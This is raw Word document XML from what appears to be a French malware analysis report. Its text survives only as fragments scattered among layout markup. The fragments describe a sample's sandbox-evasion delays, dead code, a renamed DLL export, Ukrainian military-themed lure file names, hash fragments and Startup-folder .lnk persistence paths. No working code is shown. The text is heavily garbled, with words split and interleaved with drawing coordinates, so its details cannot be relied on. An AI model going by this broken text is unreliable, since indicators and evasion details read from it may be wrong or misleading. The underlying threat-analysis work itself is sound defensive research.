            <wp:extent cx="1421765" cy="1595120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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1765" cy="1595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1765" h="1595120">
                          <a:moveTo>
                            <a:pt x="1057910" y="1595120"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1057910" y="1395730"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1421129" y="1395730"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1421129" y="1595120"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1057275" y="1396365"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1421765" y="1396365"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="760730"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="561340"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="853440" y="561340"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="853440" y="760730"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="720089" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="720089" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1164590" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="116459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2704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3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2806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3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29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1235733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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Tout code non essentiel au fonctionnement du programme a été supprimé par le script.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0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1409088</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Toutefois, afin de complexifier l'analyse du comportement de l'échantillon, plusieurs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1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1582443</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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mécanismes d'obfuscation et d'anti-analyse ont été mis en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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> œuvre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. Le programme exécute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2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1774413</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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notamment plus d'une centaine d'appels à la fonction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Sleep</w:t>
                        </w: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, d'une durée moyenne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3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1971063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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d'environ une seconde chacun, auxquels s'ajoute une temporisation supplémentaire de 60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4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2144418</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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secondes. Ces délais sont combinés à une quan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tité important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e de code mort n'ayant aucun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5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2336388</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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effet fonctionnel ainsi qu'à près de 200 appels à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Write-Host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destinés à générer un volume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6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2533038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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important de sorties sur le terminal. L'ensemble de ces techniques vise à ralentir et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7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2706393</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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perturber l'analyse dynamique, notamment au sein d'environnements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sandbox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8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2879748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="827656" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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765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automatisés.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9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3170143</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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DLL embarquée dans l’archive continue d'exporter la fonction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Func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, mais son nom a été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0352" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2403678</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3363860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="688282" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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828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Main.dll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3366793</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1051176" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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117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modifié</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="32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78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2400" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5815266</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3363860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="882596" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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259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result.dll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3424" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3583139</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3366793</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1780573" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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05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remplace</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="32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7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désormais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4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3546498</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5880553" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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805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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Une requête VirusTotal sur les métadonnées du fichier (</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle33"/>
                            <w:spacing w:val="3"/>
                            <w:highlight w:val="black"/>
                          </w:rPr>
                          <w:t xml:space="preserve">entity:file metadata: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5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3731918</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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1"/>
                            <w:highlight w:val="black"/>
                          </w:rPr>
                          <w:t xml:space="preserve">541D-8F9B | desktop-hagd25b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) permet d'identifier onze échantillons supplémentaires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6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3917338</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2674490" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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44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présentant des caractéristiques similaires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7520" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5887720</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4233568</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="579003" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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8544" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3536314</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4406923</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1013084" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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9568" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5845175</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4406923</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="664728" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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7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première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0592" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1006474</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4406923</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1323915" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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9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1616" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5751830</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4580278</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="811871" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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8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soumission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264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4925325</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3294157" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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415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Відомості з реєстру військовозобов'язаних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36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5013590</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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35de98f9e0d4812596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468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5101855</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3213588" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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358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60"/>
                          </w:rPr>
                          <w:t xml:space="preserve">про працівників 20260626-2589793-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57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5190120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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5d57480e6477118eb0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673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5278385</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3178917" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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89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1.pdf:..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.._Roaming_Microsoft_Window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7760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5285763</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="796548" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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5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26 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87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5366650</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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050502bbdb764166ff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980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5454915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="650017" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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0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08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5543180</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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a2c1e3a626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185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5631445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2796025" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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6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Menu_Programs_Startup_JJAaLUpqTM.lnk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288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5985775</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3294157" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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415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Відомості з реєстру військовозобов'язаних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39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6074040</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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24520d4654a04a4605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492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6162305</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3213588" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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358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60"/>
                          </w:rPr>
                          <w:t xml:space="preserve">про працівників 20260625-3994491-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59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6250570</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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a9ce84341bf35ec207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697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6338835</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3178917" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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89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1.pdf:..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.._Roaming_Microsoft_Window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00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6346213</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="796548" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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5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25 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90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6427100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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2a1e7f669bc0212f22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004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6515365</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="650017" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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0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10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6603630</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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783ff49565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209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6691895</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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Menu_Programs_Startup_dXd9PBI7I7RL9.lnk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31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7046225</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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05e131555faabae096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4144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7046225</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="496347" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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634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взвод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516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7222755</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3180454" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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045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розвідки.pdf:..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.._Roaming_Microsoft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61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7222755</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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0f0527cfb72d2b8e23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7216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7318398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="796548" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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65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23 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824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7399285</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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81fd0fde22b0b4e2b3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9264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7399285</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1187862" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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786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_Windows_Start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028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7575815</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2796025" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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6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Menu_Programs_Startup_ThJRq_6uEj.lnk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13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7575815</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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65c7faf445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233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7930145</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3289350" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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93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Відомость про самовільне залишення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33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8018410</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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0a9bc91e7ea2c3931f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4384" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5229567</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8106675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="419588" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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58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3018-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5408" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3946842</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8106675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="907448" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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744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частини</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="475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6432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8106675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1136975" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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7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військової</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="475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74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8194940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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662eea37c00c7c26c8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848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8283205</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3179540" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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95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4726.pdf:..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7"/>
                            <w:spacing w:val="18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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> Roaming_Microsoft_Wind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9504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8290583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="719293" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="43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2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7 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05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8371470</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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996b65f6f7afe6cce8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1552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8459735</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="803687" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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34"/>
                          </w:rPr>
                          <w:t xml:space="preserve">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25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8548000</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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f6114f94b6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360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8636265</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3107124" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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712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18"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Menu_Programs_Startup_x3U_F_q1KeVOd3</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="49"/>
                          </w:rPr>
                          <w:t xml:space="preserve">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46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8990595</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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39dd1bd3bccc314d89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564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8990595</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3289350" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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893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Відомость про самовільне залишення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6672" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5229567</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9167125</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="419588" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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58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3018-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76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9167125</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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33e5c41ed2ab084e4e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872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9167125</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1136975" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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97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військової</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="475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9744" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3946842</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9167125</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="907448" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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744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частини</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="475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0768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9205618</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="719293" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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2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5 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17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9343655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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20af569f77b7cf09ab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281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9343655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3179895" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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989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4908.pdf:..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.._Roaming_Microsoft_Win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384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9520185</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="880522" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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052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48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9520185</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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c5855b9483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588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69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793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89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998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2130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697865"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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6978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697865">
                          <a:moveTo>
                            <a:pt x="4749799" y="697865"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="697865"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749799" y="697865"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1498599" y="697865"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="697865"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749164" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498599" y="697865"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="697865"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="697865"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1497965" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="69786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366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1689109</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="7728584"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="44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77285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7728584">
                          <a:moveTo>
                            <a:pt x="0" y="6176645"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6176645"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7728584"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7728584"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6176645"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="6016625"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6016625"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6176645"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6176645"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6016625"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4750435" y="6010275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="6010275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="5126990"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="5126990"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="6010275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1499234" y="6010275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="6010275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="5126990"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="5126990"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="6010275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="6010275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="6010275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="5126990"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="5126990"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="6010275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4750435" y="5126355"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="5126355"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="4243070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="4243070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="5126355"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1499234" y="5126355"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="5126355"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4749800" y="4243070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="4243070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1499234" y="5126355"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="5126355"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="5126355"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1498600" y="4243070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="4243070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="5126355"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4750435" y="4242434"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="4242434"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3359149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="3359149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4750435" y="4242434"/>
